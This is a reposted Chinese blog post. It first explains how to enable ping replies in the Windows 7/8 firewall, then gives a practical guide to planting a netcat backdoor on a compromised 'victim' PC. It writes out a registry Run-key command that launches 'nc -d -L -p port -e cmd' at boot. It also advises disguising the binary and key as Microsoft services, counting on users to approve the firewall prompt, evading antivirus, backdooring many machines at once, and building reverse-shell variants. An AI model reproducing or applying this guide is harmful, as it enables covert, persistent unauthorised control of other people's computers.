ping不通win7、8解决方法以及nc后门的制作
默認情況下win7、8是不能被ping通的,出于安全考慮不允許外部主機對其進行Ping測試。(關(guān)閉防火墻不能解決此問題!!!)
解決方法:允許ICMP回顯,設(shè)置如下:
Firewall.cpl——高級設(shè)置——入站規(guī)則——文件和打印機共享(回顯請求 -ICMPv4-In),win7下有兩個(域,公用專用),win8下有三個(域,公用,專用),右擊啟用規(guī)則即可,IPV6亦然,個人測試過程中發(fā)現(xiàn)其實只要啟用公用這一項就Ok了。下面分別是win7和win8的firewall。
nc這把瑞士×××的確是屢試不爽,唯一可惜的就是會被殺軟查殺,只能自己做免殺,還好源代碼是公開的,懂編程的話可以做源碼級別的免殺,下面說下利用nc在內(nèi)網(wǎng)做不會被殺軟查殺的后門,并且無視遠程pc用戶名密碼的修改,連接類型為正向主動型連接。假設(shè)通過各種溢出漏洞等拿到了Victim_pc的shell,當然nc需要傳過去(這步有點問題,假設(shè)本地開了ftp,遠程下載nc后會被360查殺,始終想不出有什么好的方法可以下載文件到victim_pc而不被查殺,除了做免殺,求高手指導),然后其實就是開啟一個nc監(jiān)聽程序并返回shell,當然這邊需要做到開機啟動,比較好的方法就是添加到注冊表啟動項里面,reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v“鍵值名稱” /d “nc –d –L –p port –e cmd /f“,這樣就添加到開機啟動項里面了,當然此處也需要一點點社工的思想,比如nc的改名,鍵值名稱的改名,你需要寫的比較像,因為msconfig以及任務(wù)管理器會顯示。
這邊我只是把nc改成了winsearch,當然完全可以改成能欺騙別人的名字,比如一些MS服務(wù)名啦等等。這樣重啟后victim_pc就會一直監(jiān)聽本地端口,本地就可以連接其ip、port得到其shell,這種后門的好處就是無視殺毒軟件的查殺以及用戶名密碼的修改,原因沒有過多深入,覺得應(yīng)該是nc在殺軟前啟動的或者至少在殺軟監(jiān)視之前nc已經(jīng)做好了監(jiān)聽工作。這邊也會出現(xiàn)一個問題,就是啟動項第一次運行nc工具的時候防火墻會彈出提示,是否允許通過,如果你把名字改的像一點,一般別人是會點擊允許的。此外,需要一提的就是假設(shè)victim_pc的OS為win7,本地ping不通,但是nc是可以穿透的,無視防火墻的限制。
也許有人會有疑問,既然得到shell后下載本地nc時被查殺,又如何做后續(xù)的步驟呢,亦或者nc已經(jīng)做好了免殺,可以下載到遠程pc,那不是隨便了么。誠然,這的確是矛盾的地方,所以我說的只是一種思路,不用太鉆牛角尖。另外可能會出現(xiàn)的一種情況就是,nc做好免殺后在當時可能是有用的,可是不能保證以后也可以免殺,必須相信殺軟的更新速度和技術(shù),所以這種方法還是有一定的參考價值的。
當然這邊講的情況是內(nèi)網(wǎng),其實外網(wǎng)也一樣,只是你需要搜集對方的ip地址罷了,如果對方在內(nèi)網(wǎng),還需要做端口轉(zhuǎn)發(fā)。在內(nèi)網(wǎng)中還有個好處就是如果你給好多臺pc都種了此nc后門,那么你完全可以自己寫一個批處理程序來進行連接,程序我就不寫了,思路如下:先掃描存活主機,當然需要強力一點的掃描軟件,首推nmap,防止win7\8 ping不通的情況,接著開啟n個nc連接存活主機。
另外這邊講的是正向連接型,有些情況下會被防火墻攔截,當然最好的就是反彈型的后門,其實原理也一樣,本地nc監(jiān)聽,victim_pc主動連接,也可以做成開機啟動項的形式,只不過需要循環(huán)連接本地主機(比如間隔時間為1min),而本地需要連接遠端的時候開啟監(jiān)聽,有點類似于灰鴿子反彈型***的制作思想,其實遠控工具無非就是把一些功能都集成到一起罷了。
此外不得不提的就是nc強大的功能,可以收發(fā)郵件,可以端口轉(zhuǎn)發(fā)做中繼,可以ftp,可以發(fā)送接收文件,還可以掃描ip、port,簡直是無所不能,不得不注意的是它的大小僅僅只有60K,真不愧是瑞士×××。
轉(zhuǎn)載于:https://blog.51cto.com/lunachy/1246435
總結(jié)
以上是生活随笔為你收集整理的ping不通win7、8解决方法以及nc后门的制作的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 小乔大招叫什么 王者荣耀小乔大招介绍
- 下一篇: 有效沟通 02